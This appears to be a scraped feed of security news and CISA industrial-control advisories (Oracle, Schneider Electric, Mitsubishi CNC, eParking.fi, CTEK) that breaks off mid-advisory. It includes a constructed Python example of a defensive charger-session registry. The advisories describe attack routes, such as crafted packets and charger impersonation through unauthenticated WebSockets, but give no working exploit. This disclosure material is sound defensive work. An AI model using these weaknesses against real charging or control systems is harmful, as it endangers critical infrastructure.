A vulnerability has been discovered in Oracle Products that could allow for remote code execution. Oracle Identity Manager is an identity management product that automates user provisioning, identity administration, and password management, integrated in a comprehensive workflow engine. Oracle Web Services Manager is a comprehensive security and policy management framework within Oracle Fusion Middleware that allows enterprises to secure, manage, and monitor web services.

Successful exploitation of this vulnerability could allow for remote code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer rights on the system could be less impacted than those who operate with administrative user rights.

0
‘CanisterWorm’ Springs Wiper Attack Targeting Iran

A financially motivated data theft and extortion group is attempting to inject itself into the Iran war, unleashing a worm that spreads through poorly secured cloud services and wipes data on infected systems that use Iran's time zone or have Farsi set as the default language.

0
CISA Adds Five Known Exploited Vulnerabilities to Catalog

CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
* CVE-2025-31277 Apple Multiple Products Buffer Overflow Vulnerability
* CVE-2025-32432 Craft CMS Code Injection Vulnerability
* CVE-2025-43510 Apple Multiple Products Improper Locking Vulnerability
* CVE-2025-43520 Apple Multiple Products Classic Buffer Overflow Vulnerability
* CVE-2025-54068 Laravel Livewire Code Injection Vulnerability
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

0
Feds Disrupt IoT Botnets Behind Huge DDoS Attacks

The U.S. Justice Department joined authorities in Canada and Germany in dismantling the online infrastructure behind four highly disruptive botnets that compromised more than three million hacked Internet of Things (IoT) devices, such as routers and web cameras. The feds say the four botnets -- named Aisuru, Kimwolf, JackSkid and Mossad -- are responsible for a series of recent record-smashing distributed denial-of-service (DDoS) attacks capable of knocking nearly any target offline.

0
Schneider Electric EcoStruxure Automation Expert

Summary: Schneider Electric is aware of a vulnerability in its EcoStruxure™ Automation Expert product. EcoStruxure™ Automation Expert is plant automation software designed for digital control systems in discrete, hybrid and continuous industrial processes, a totally integrated automation solution designed to enhance flexibility, efficiency and scalability. Failure to apply the remediation provided below may risk execution of arbitrary commands on the engineering workstation, which could result in a potential compromise of the full system.

The following versions of Schneider Electric EcoStruxure Automation Expert are affected:
* EcoStruxure™ Automation Expert vers:intdot/<25.0.1, 25.0.1

CVSS v3 8.2. Vendor: Schneider Electric. Equipment: Schneider Electric EcoStruxure Automation Expert. Vulnerabilities: Improper Control of Generation of Code ('Code Injection').

Background: Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy. Countries/Areas Deployed: Worldwide. Company Headquarters Location: France.

Vulnerabilities

CVE-2026-2273
A CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability exists that could cause execution of untrusted commands on the engineering workstation, which could result in a limited compromise of the workstation and a potential loss of Confidentiality, Integrity and Availability of the subsequent system when an authenticated user opens a malicious project file.
Affected Products: Schneider Electric EcoStruxure Automation Expert (Vendor: Schneider Electric). Product Version: EcoStruxure™ Automation Expert versions prior to v25.0.1. Product Status: fixed, known_affected.
Remediations:
Vendor fix: Version v25.0.1 of EcoStruxure™ Automation Expert includes a fix for this vulnerability and is available for download here: https://www.se.com/ww/en/product-range/23643079-ecostruxure-automation-expert/
Mitigation: If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit:
* Solution and archive files must be stored within the user's home directory or in any location protected by appropriate Windows file-system access controls to prevent unauthorized access in multi-user environments.
* Users who choose to store files outside their home directory are responsible for applying restrictive Windows permissions to secure those locations.
* Before opening any solution or archive file, users are required to verify its authenticity and ensure that it has not been modified by unauthorized users.
For detailed mitigation steps, refer to the User Manual: https://product-help.se.com/EcoStruxure%20Automation%20Expert/25.0/Offer%20Guides/en-US/EAE_UM?t=EAE_UM%2FSolutionIntegrity-FE037ED3.html%3Frhhlterm%3Dundefined%253Frhsearch%253Dundefined&theme=Help
Relevant CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')
Metrics: CVSS v3.1 base score 8.2 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Acknowledgments: Schneider Electric CPCERT reported this vulnerability to CISA. Raffaele Bova of Nozomi Networks reported this vulnerability to Schneider Electric.

General Security Recommendations
We strongly recommend the following industry cybersecurity best practices.
* Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
* Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
* Place all controllers in locked cabinets and never leave them in the "Program" mode.
* Never connect programming software to any network other than the network intended for that device.
* Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
* Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
* Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
* When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
For more information refer to the Schneider Electric [Recommended Cybersecurity Best Practices](https://www.se.com/us/en/download/document/7EN52-0390/) document.

For More Information
This document provides an overview of the identified vulnerability or vulnerabilities and actions required to mitigate. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process. For further information related to cybersecurity in Schneider Electric's products, visit the company's cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp

LEGAL DISCLAIMER
THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS "NOTIFICATION") ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN "AS-IS" BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION.

About Schneider Electric
Schneider's purpose is to create Impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in Sustainability and Efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes. Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI-enabled Industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com

Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:
* Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
* Locate control system networks and remote devices behind firewalls and isolate them from business networks.
* When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer: This ICSA is a verbatim republication of Schneider Electric CPCERT SEVD-2026-069-04 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric CPCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-03-10
* 2026-03-10, revision 1: Original Release
* 2026-03-19, revision 2: Initial CISA Republication of Schneider Electric CPCERT SEVD-2026-069-04 advisory

0
Mitsubishi Electric CNC Series

Summary: Successful exploitation of this vulnerability could allow a remote attacker to cause an out-of-bounds read, resulting in a denial-of-service condition in the affected products.

The following versions of Mitsubishi Electric CNC Series are affected:
* M800VW (BND-2051W000): <=BB
* M800VS (BND-2052W000): <=BB
* M80V (BND-2053W000): <=BB
* M80VW (BND-2054W000): <=BB
* M800W (BND-2005W000): <=FM
* M800S (BND-2006W000): <=FM
* M80 (BND-2007W000): <=FM
* M80W (BND-2008W000): <=FM
* E80 (BND-2009W000): <=FM
* C80 (BND-2036W000): vers:all/*
* M750VW (BND-1015W002): vers:all/*
* M730VW (BND-1015W000): vers:all/*
* M720VW (BND-1015W000): vers:all/*
* M750VS (BND-1012W002): vers:all/*
* M730VS (BND-1012W000): vers:all/*
* M720VS (BND-1012W000): vers:all/*
* M70V (BND-1018W000): vers:all/*
* E70 (BND-1022W000): vers:all/*
* NC Trainer2 (BND-1802W000): vers:all/*
* NC Trainer2 plus (BND-1803W000): vers:all/*

CVSS v3 5.9. Vendor: Mitsubishi Electric. Equipment: Mitsubishi Electric CNC Series. Vulnerabilities: Improper Validation of Specified Index, Position, or Offset in Input.

Background: Critical Infrastructure Sectors: Critical Manufacturing. Countries/Areas Deployed: Worldwide. Company Headquarters Location: Japan.

Vulnerabilities

CVE-2025-2399
An Improper Validation of Specified Index, Position, or Offset in Input (CWE-1285) vulnerability in the affected products allows a remote attacker to cause an out-of-bounds read, resulting in a denial-of-service condition in the affected products, by sending specially crafted packets to TCP port 683.
Affected Products: Mitsubishi Electric CNC Series (Vendor: Mitsubishi Electric). Product Version: the Mitsubishi Electric products and version ranges listed above. Product Status: known_affected.
Remediations:
* Vendor fix: Please apply the fixed version (BC or later) for Mitsubishi Electric M800VW (BND-2051W000), M800VS (BND-2052W000), M80V (BND-2053W000), and M80VW (BND-2054W000). For instructions on how to apply it, please consult your Mitsubishi Electric representative.
* Vendor fix: Please apply the fixed version (FN or later) for Mitsubishi Electric M800W (BND-2005W000), M800S (BND-2006W000), M80 (BND-2007W000), M80W (BND-2008W000), and E80 (BND-2009W000). For instructions on how to apply it, please consult your Mitsubishi Electric representative.
* Mitigation: For customers of products that do not have a fixed version or who cannot immediately update the product, Mitsubishi Electric recommends using a firewall or virtual private network (VPN) to prevent unauthorized access, when internet access is required, to minimize the risk of exploiting this vulnerability.
* Mitigation: For customers of products that do not have a fixed version or who cannot immediately update the product, Mitsubishi Electric recommends using the product within a LAN and blocking access from untrusted networks and hosts through a firewall, to minimize the risk of exploiting this vulnerability.
* Mitigation: For customers of products that do not have a fixed version or who cannot immediately update the product, Mitsubishi Electric recommends using IP filters to prevent unauthorized access, when internet access is required, to minimize the risk of exploiting this vulnerability. The IP filter function is available for the M800V/M80V Series and M800/M80/E80 Series. For details about the IP filter function, refer to the following manual for each product: M800V/M80V Series Instruction Manual "16. Appendix 3 IP Address Filter Setting Function"; M800/M80/E80 Series Instruction Manual "15. Appendix 2 IP Address Filter Setting Function".
* Mitigation: For customers of products that do not have a fixed version or who cannot immediately update the product, Mitsubishi Electric recommends restricting physical access to the affected product and to all computers and network devices to which the products are connected, to minimize the risk of exploiting this vulnerability.
* Mitigation: For customers of products that do not have a fixed version or who cannot immediately update the product, Mitsubishi Electric recommends installing anti-virus software on PCs that can access the affected product, to minimize the risk of exploiting this vulnerability.
* Mitigation: For more information, see Mitsubishi Electric 2025-022: https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-022_en.pdf
Relevant CWE: CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input
Metrics: CVSS v3.1 base score 5.9 (MEDIUM), vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Acknowledgments: Mitsubishi Electric reported this vulnerability to CISA.

Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:
* Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
* Locate control system networks and remote devices behind firewalls and isolate them from business networks.
* When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer: This ICSA is a verbatim republication of CISA V20250121-001#02 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact CISA directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-03-19
* 2026-03-19, revision 1: Initial CISA Republication of Mitsubishi Electric security advisory 2025-022

0
IGL-Technologies eParking.fi

Summary
Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks.

Affected Products
The following versions of IGL-Technologies eParking.fi are affected: eParking.fi, all versions (vers:all/*). Product status: known_affected.

CVSS v3: 9.4
Vendor: IGL-Technologies
Equipment: eParking.fi
Vulnerabilities: Missing Authentication for Critical Function, Improper Restriction of Excessive Authentication Attempts, Insufficient Session Expiration, Insufficiently Protected Credentials

Background
Critical Infrastructure Sectors: Energy, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Finland

Vulnerabilities

CVE-2026-29796 (CWE-306 Missing Authentication for Critical Function)
WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging infrastructure, and corruption of charging network data reported to the backend.
CVSS v3.1 base score 9.4 (CRITICAL); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CVE-2026-31903 (CWE-307 Improper Restriction of Excessive Authentication Attempts)
The WebSocket Application Programming Interface lacks restrictions on the number of authentication requests. This absence of rate limiting may allow an attacker to conduct denial-of-service attacks by suppressing or mis-routing legitimate charger telemetry, or to conduct brute-force attacks to gain unauthorized access.
CVSS v3.1 base score 7.5 (HIGH); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-32663 (CWE-613 Insufficient Session Expiration)
The WebSocket backend uses charging station identifiers to uniquely associate sessions but allows multiple endpoints to connect using the same session identifier. This implementation results in predictable session identifiers and enables session hijacking or shadowing, where the most recent connection displaces the legitimate charging station and receives backend commands intended for that station. This vulnerability may allow unauthorized users to authenticate as other users or enable a malicious actor to cause a denial-of-service condition by overwhelming the backend with valid session requests.
CVSS v3.1 base score 7.3 (HIGH); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2026-31926 (CWE-522 Insufficiently Protected Credentials)
Charging station authentication identifiers are publicly accessible via web-based mapping platforms.
CVSS v3.1 base score 6.5 (MEDIUM); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Remediations (the same mitigations are listed for all four CVEs above)
IGL-Technologies has updated eParking's OCPP servers to reduce the risks posed by these vulnerabilities. These updates implemented the following security controls:
1) Enforce modern security profiles and stronger authentication.
2) Device-level whitelisting was implemented to ensure that only authorized charging units can connect.
3) Rate-limiting controls prevent excessive requests and reduce DoS risk.
4) Enhanced automated monitoring and alerting to detect abnormal network activity.
Devices using the encrypted deployment of eParking's OCPP servers or IGL-Technologies' proprietary eTolppa protocol are not impacted by these vulnerabilities.
To prevent this in the future, IGL-Technologies will continue vulnerability monitoring under their ISO 27001:2022 security program and tighten security requirements for future third-party OCPP hardware approvals.
For more information, please contact the IGL-Technologies security team at security@igl.fi.

Acknowledgments
Khaled Sarieddine and Mohammad Ali Sayed reported these vulnerabilities to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
• Locate control system networks and remote devices behind firewalls and isolate them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-19
2026-03-19, Revision 1: Initial Publication

CTEK Chargeportal

Summary
Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks.

Affected Products
The following versions of CTEK Chargeportal are affected: Chargeportal, all versions (vers:all/*). Product status: known_affected.

CVSS v3: 9.4
Vendor: CTEK
Equipment: Chargeportal
Vulnerabilities: Missing Authentication for Critical Function, Improper Restriction of Excessive Authentication Attempts, Insufficient Session Expiration, Insufficiently Protected Credentials

Background
Critical Infrastructure Sectors: Energy, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Sweden

Vulnerabilities

CVE-2026-25192 (CWE-306 Missing Authentication for Critical Function)
WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging infrastructure, and corruption of charging network data reported to the backend.
CVSS v3.1 base score 9.4 (CRITICAL); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CVE-2026-31904 (CWE-307 Improper Restriction of Excessive Authentication Attempts)
The WebSocket Application Programming Interface lacks restrictions on the number of authentication requests. This absence of rate limiting may allow an attacker to conduct denial-of-service attacks by suppressing or mis-routing legitimate charger telemetry, or to conduct brute-force attacks to gain unauthorized access.
CVSS v3.1 base score 7.5 (HIGH); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-27649 (CWE-613 Insufficient Session Expiration)
The WebSocket backend uses charging station identifiers to uniquely associate sessions but allows multiple endpoints to connect using the same session identifier. This implementation results in predictable session identifiers and enables session hijacking or shadowing, where the most recent connection displaces the legitimate charging station and receives backend commands intended for that station. This vulnerability may allow unauthorized users to authenticate as other users or enable a malicious actor to cause a denial-of-service condition by overwhelming the backend with valid session requests.
CVSS v3.1 base score 7.3 (HIGH); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2026-28204 (CWE-522 Insufficiently Protected Credentials)
Charging station authentication identifiers are publicly accessible via web-based mapping platforms.
CVSS v3.1 base score 6.5 (MEDIUM); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Remediations (the same mitigation is listed for all four CVEs above)
CTEK will be sunsetting this product in April 2026. Please contact CTEK for more information: https://www.ctek.com/support.

Acknowledgments
Khaled Sarieddine and Mohammad Ali Sayed reported these vulnerabilities to CISA.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-19
2026-03-19, Revision 1: Initial Publication
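The eParking.fi remediation above lists four backend controls (authentication with modern security profiles, device-level whitelisting, rate limiting, monitoring), and the CVE-2026-32663 / CVE-2026-27649 text describes how a second connection presenting the same station identifier displaces the legitimate charger. The following Python model is an added example, not code from IGL-Technologies, CTEK or CISA: it shows how an OCPP-J backend's session registry can enforce those controls and refuse the displacing connection. The class names, the PBKDF2-based credential store, the event names and the station identifier CP-0001 are constructed for illustration.

```python
"""Illustrative OCPP-J backend session registry (constructed example, no network I/O).
Implements the controls named in the eParking.fi remediation (per-station credentials,
device allowlist, rate-limited authentication, monitoring events) and refuses a second
connection for a live station identifier instead of displacing the legitimate charger,
the shadowing behaviour described in CVE-2026-32663 and CVE-2026-27649.
"""
from __future__ import annotations

import hashlib, hmac, secrets
from dataclasses import dataclass, field


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class Session:
    station_id: str
    peer: str          # remote address of the WebSocket client
    last_seen: float   # timestamp of the last message on this session


@dataclass
class Registry:
    # Allowlist: station identifier -> (salt, PBKDF2 hash of that station's password).
    allowlist: dict[str, tuple[bytes, bytes]] = field(default_factory=dict)
    sessions: dict[str, Session] = field(default_factory=dict)
    failures: dict[str, list[float]] = field(default_factory=dict)    # failed attempts per peer
    events: list[tuple[str, str, str]] = field(default_factory=list)  # (event, station_id, peer)
    max_failures: int = 5          # failures tolerated per peer ...
    window_s: float = 300.0        # ... inside this sliding window
    idle_timeout_s: float = 120.0  # silent sessions are released after this long

    def enroll(self, station_id: str, password: str) -> None:
        """Device-level allowlisting: only enrolled identifiers may ever connect."""
        salt = secrets.token_bytes(16)
        self.allowlist[station_id] = (salt, _derive(password, salt))

    def _record_failure(self, station_id: str, peer: str, now: float, reason: str) -> None:
        self.failures.setdefault(peer, []).append(now)
        self.events.append((reason, station_id, peer))

    def _rate_limited(self, peer: str, now: float) -> bool:
        recent = [t for t in self.failures.get(peer, []) if now - t < self.window_s]
        self.failures[peer] = recent
        return len(recent) >= self.max_failures

    def expire_idle(self, now: float) -> None:
        """Session expiration: release identifiers whose charger has gone silent."""
        for sid, s in list(self.sessions.items()):
            if now - s.last_seen > self.idle_timeout_s:
                del self.sessions[sid]
                self.events.append(("session_expired", sid, s.peer))

    def heartbeat(self, station_id: str, now: float) -> None:
        """Any message from the live session refreshes its idle deadline."""
        if station_id in self.sessions:
            self.sessions[station_id].last_seen = now

    def connect(self, station_id: str, password: str, peer: str, now: float) -> str:
        """Handle a WebSocket upgrade request; returns 'accepted' or the rejection reason."""
        self.expire_idle(now)
        if self._rate_limited(peer, now):  # checked before any credential work is done
            self.events.append(("rate_limited", station_id, peer))
            return "rate_limited"
        entry = self.allowlist.get(station_id)
        if entry is None:
            self._record_failure(station_id, peer, now, "not_allowlisted")
            return "not_allowlisted"
        salt, expected = entry
        if not hmac.compare_digest(_derive(password, salt), expected):
            self._record_failure(station_id, peer, now, "bad_credentials")
            return "bad_credentials"
        if station_id in self.sessions:
            # Do not displace the live session: the newcomer is refused and flagged for review.
            self.events.append(("duplicate_connection_refused", station_id, peer))
            return "already_connected"
        self.sessions[station_id] = Session(station_id, peer, now)
        self.events.append(("accepted", station_id, peer))
        return "accepted"


def run_scenario() -> dict[str, object]:
    """Walk a constructed sequence of connection attempts against one enrolled station."""
    reg = Registry(max_failures=3, window_s=60.0, idle_timeout_s=30.0)
    reg.enroll("CP-0001", "constructed-demo-secret")  # constructed identifier and secret
    out: dict[str, object] = {}
    out["legit"] = reg.connect("CP-0001", "constructed-demo-secret", "10.0.0.5", now=0.0)
    # A second peer presents the same (publicly listed) identifier while the charger is live.
    out["shadow"] = reg.connect("CP-0001", "constructed-demo-secret", "203.0.113.9", now=1.0)
    out["legit_still_owner"] = reg.sessions["CP-0001"].peer
    out["unknown_id"] = reg.connect("CP-9999", "anything", "203.0.113.9", now=2.0)
    # Three wrong passwords exhaust the peer's budget; the right one is then refused as well.
    for i in range(3):
        reg.connect("CP-0001", f"guess{i}", "198.51.100.7", now=3.0 + i)
    out["locked_out"] = reg.connect("CP-0001", "constructed-demo-secret", "198.51.100.7", now=7.0)
    # Without a heartbeat for longer than idle_timeout_s the identifier is released and reusable.
    out["after_expiry"] = reg.connect("CP-0001", "constructed-demo-secret", "10.0.0.5", now=100.0)
    out["alerts"] = sorted({e[0] for e in reg.events if e[0] != "accepted"})
    return out
```

The `events` list is the hook for the fourth control: every refused duplicate, unknown identifier or lockout is a record a monitoring pipeline can alert on.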

Schneider Electric Modicon M241, M251, and M262

Summary
Successful exploitation of this vulnerability could allow an attacker to cause a denial-of-service condition on the product.

Affected Products
The following versions of Schneider Electric Modicon M241, M251, and M262 are affected:
• Modicon M241 (Modicon_Controller_M241): versions prior to 5.4.13.12
• Modicon M251 (Modicon_Controller_M251): versions prior to 5.4.13.12
• Modicon M262 (Modicon_Controller_M262): versions prior to 5.4.10.12
Product status: known_affected.

CVSS v3: 5.3
Vendor: Schneider Electric
Equipment: Modicon M241, M251, and M262
Vulnerability: Improper Resource Shutdown or Release

Background
Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities

CVE-2025-13901 (CWE-404 Improper Resource Shutdown or Release)
An Improper Resource Shutdown or Release vulnerability exists that could cause a partial denial of service on the Machine Expert protocol when an unauthenticated attacker sends a malicious payload to occupy active communication channels.
CVSS v3.1 base score 5.3 (MEDIUM); vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Remediations
Schneider Electric has identified the following specific workarounds and mitigations users can apply to reduce risk:

Modicon Controller M241
Firmware version 5.4.13.12, delivered with EcoStruxure™ Machine Expert v2.5.0.1, includes a fix for this vulnerability and can be installed through the Schneider Electric Software Installer, available here: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/.
• On the engineering workstation, install v2.5.0.1 of EcoStruxure™ Machine Expert. For help, refer to the Schneider Electric Software Installer User Guide: https://www.se.com/ww/en/download/document/EIO0000005500/.
• Update the Modicon Controller M241 to the latest firmware and perform a reboot. For instructions, refer to the Modicon M241 Logic Controller, Programming Guide: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/.

Modicon Controller M251
Firmware version 5.4.13.12, delivered with EcoStruxure™ Machine Expert v2.5.0.1, includes a fix for this vulnerability and can be installed through the Schneider Electric Software Installer, available here: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/.
• On the engineering workstation, install v2.5.0.1 of EcoStruxure™ Machine Expert. For help, refer to the Schneider Electric Software Installer User Guide: https://www.se.com/ww/en/download/document/EIO0000005500/.
• Update the Modicon Controller M251 to the latest firmware and perform a reboot. For instructions, refer to the Modicon M251 Logic Controller, Programming Guide: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/.

Modicon Controller M262
